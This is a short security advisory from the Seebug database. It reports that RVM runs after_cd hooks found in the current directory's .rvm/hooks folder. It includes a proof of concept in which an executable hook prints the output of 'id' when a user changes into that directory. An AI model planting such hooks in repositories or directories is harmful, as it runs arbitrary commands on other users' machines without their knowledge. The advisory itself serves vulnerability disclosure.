RVM automatically executes hooks located in $PWD

2017-02-16T00:00:00
ID SSV:92688
Type seebug
Reporter Root
Modified 2017-02-16T00:00:00

Description

RVM, by default, hooks cd and automatically executes various auxiliary hooks when a user changes into a directory. The mechanics of these additional after_cd hooks are detailed at <https://rvm.io/workflow/hooks>.

What this page fails to mention is that hooks, as of a vulnerable version, are not only loaded from ~/.rvm/hooks but are also loaded from $PWD/.rvm/hooks as per the code, as of a vulnerable commit, at <https://github.com/rvm/rvm/blob/b04c0158d/scripts/hook#L23-L27>.

This behaviour can be used to achieve arbitrary command execution when a user changes into a directory with malicious contents.

Note that hook files must be executable for them to be triggered.

POC

```text rvm@e6aeaf6d79ec:~$ mkdir -p poc/.rvm/hooks

rvm@e6aeaf6d79ec:~$ cat > poc/.rvm/hooks/after_cd_poc

!/bin/sh

echo "Command execution as $(id)" ^D

rvm@e6aeaf6d79ec:~$ chmod a+x poc/.rvm/hooks/after_cd_poc

rvm@e6aeaf6d79ec:~$ cd poc

Command execution as uid=1000(rvm) gid=1000(rvm) groups=1000(rvm) rvm@e6aeaf6d79ec:~/poc$ ```